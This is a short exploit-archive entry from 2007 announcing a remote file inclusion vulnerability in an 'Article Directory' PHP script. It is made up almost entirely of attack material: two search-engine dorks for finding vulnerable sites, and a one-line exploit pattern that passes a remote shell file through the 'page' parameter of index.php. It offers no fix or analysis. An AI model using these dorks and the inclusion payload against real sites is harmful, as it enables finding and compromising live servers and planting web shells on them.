id: 2047
date: 07/23/2007
title: Article Directory (index.php page) Remote File Inclusion Vulnerability
author: mozi
cves: 

======================================================================
Article Directory (index.php page) Remote File Inclusion Vulnerability
======================================================================



dork:inurl:index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
dork:inurl:index.php?pagedb=rss
expl:index.php?page=shell?
 



#  0day.today [2023-03-25]  #